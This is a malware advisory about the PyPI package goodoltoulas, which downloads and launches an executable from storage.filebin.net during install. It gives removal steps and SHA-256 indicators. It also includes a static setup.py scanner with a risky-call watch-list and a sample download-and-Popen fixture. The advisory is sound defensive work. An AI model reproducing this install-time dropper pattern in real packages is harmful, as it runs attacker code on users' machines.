Malicious package: goodoltoulas (PyPI)

Malicious code in goodoltoulas (PyPI). Remove it immediately and rotate any exposed credentials.

MAL-2026-5272
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
pip uninstall goodoltoulas

What this malware does

On pip install goodoltoulas, setup.py unconditionally invokes setup_helper(), which downloads an opaque PE binary from an anonymous file-hosting service (storage.filebin.net) into C:\MALWARE_DELETE\main.exe and launches it via subprocess.Popen with CREATE_NEW_CONSOLE. There is no hash check, signature verification, or version pinning, and the host is unrelated to any package publisher. The library surface is a thin decoy: __init__.py forwards all attribute access to the requests module, and the README advertises 'A simple request cloner for Python', providing cover for the install-time dropper. The drop path uses a self-incriminating directory name (C:\MALWARE_DELETE) and the response carries application/vnd.microsoft.portable-executable, confirming hostile intent. Any Windows host on which pip install runs executes attacker-controlled code immediately.

During installation, the package attempts to download and run an executable, imitating malicious activity.

Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: 2026-06-goodoldtoulas

Reasons (based on the campaign):

  • The package overrides the install command in setup.py to execute malicious code during installation.

  • Downloads and executes a remote executable.

Malicious versions (1 flagged)

0.1.0

Indicators of compromise (SHA-256)

d1279e2d267bf2af95bf5c3a98cc71ac362ed2af7aa35f6bbfe1f05bb839cb18
98a84d10e07878c98ffa21b3920940b10ffac4d3cdd66250c046391ea502aaff
ee2ef27464f7f6b4aa1b5615a42ebd130e31cf169a4f3396656108d63a326b1b
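The two behaviours this advisory flags (an unconditional module-level call in setup.py that downloads and launches a binary, and the override of install commands) are visible to a static reader of setup.py before anything is built, and the SHA-256 indicators above can be matched against archives already on disk. The following is an added example of both checks, not O3 Security's tooling nor anything from the package: it parses setup.py with Python's ast module and never executes it. RISKY_MODULES, RISKY_CALLS, the example.invalid URL and SAMPLE_SETUP_PY are constructed assumptions for the demonstration; the IOC_SHA256 set is copied from this page.

```python
import ast
import hashlib
from importlib import metadata

# SHA-256 indicators listed in the advisory above (copied from the page).
IOC_SHA256 = {
    "d1279e2d267bf2af95bf5c3a98cc71ac362ed2af7aa35f6bbfe1f05bb839cb18",
    "98a84d10e07878c98ffa21b3920940b10ffac4d3cdd66250c046391ea502aaff",
    "ee2ef27464f7f6b4aa1b5615a42ebd130e31cf169a4f3396656108d63a326b1b",
}

# Assumed watch-lists: modules and calls that a metadata-only setup.py has no need for.
RISKY_MODULES = {"subprocess", "urllib", "requests", "socket", "ctypes"}
RISKY_CALLS = {
    "subprocess.Popen", "subprocess.run", "subprocess.call", "os.system", "os.popen",
    "urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get", "exec", "eval",
}


def _dotted_name(node):
    """Rebuild 'a.b.c' from a Name/Attribute chain; None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source):
    """Statically flag install-time dropper patterns in setup.py source. Never executes it."""
    tree = ast.parse(source)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in RISKY_MODULES:
                    findings.append(f"import of {alias.name} (line {node.lineno})")
        elif isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in RISKY_MODULES:
                findings.append(f"import from {node.module} (line {node.lineno})")
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in RISKY_CALLS:
                findings.append(f"call to {name} (line {node.lineno})")
            if name == "setup":
                # cmdclass= lets a package replace the install/develop/egg_info commands.
                for kw in node.keywords:
                    if kw.arg == "cmdclass":
                        findings.append(f"setup() overrides commands via cmdclass (line {node.lineno})")
    # Any top-level call other than setup() runs unconditionally whenever pip builds the sdist.
    for stmt in tree.body:
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
            name = _dotted_name(stmt.value.func)
            if name != "setup":
                findings.append(f"module-level call to {name}() runs on every install (line {stmt.lineno})")
    return findings


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def match_iocs(artifacts, iocs=IOC_SHA256):
    """artifacts: {label: bytes}, e.g. cached sdists/wheels read into memory. Returns matching labels."""
    return sorted(label for label, data in artifacts.items() if sha256_hex(data) in iocs)


def is_installed(dist_name):
    """True if the distribution is present in the current interpreter's site-packages."""
    try:
        metadata.distribution(dist_name)
        return True
    except metadata.PackageNotFoundError:
        return False


# Constructed fixture mimicking the pattern described above; it is only parsed, never run.
SAMPLE_SETUP_PY = '''\
import subprocess
import urllib.request
from setuptools import setup

def setup_helper():
    urllib.request.urlretrieve("https://example.invalid/payload", "placeholder.exe")
    subprocess.Popen(["placeholder.exe"])

setup_helper()
setup(name="example-pkg", version="0.1.0")
'''

if __name__ == "__main__":
    for finding in scan_setup_py(SAMPLE_SETUP_PY):
        print("FLAG:", finding)
    print("goodoltoulas installed:", is_installed("goodoltoulas"))
```

One caveat when obtaining the setup.py to scan: pip itself runs setup.py to produce metadata for an sdist, so feed the scanner an archive fetched from the index without a pip build step and extracted by hand; the scanner only reads text. The module-level check is deliberately blunt (any top-level call that is not setup()) because, as in this package, the unconditional call is the whole mechanism.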

Frequently asked questions

No. goodoltoulas on PyPI has been identified as a malicious package (version 0.1.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

2026-06-goodoldtoulas (IN-MAL-2026-006185, IN-MAL-2026-006186)

Credits

  • Amazon Inspector · finder
  • Kamil Mańkowski (kam193) · reporter

goodoltoulas (PyPI) malicious package — MAL-2026-5272 | O3 Security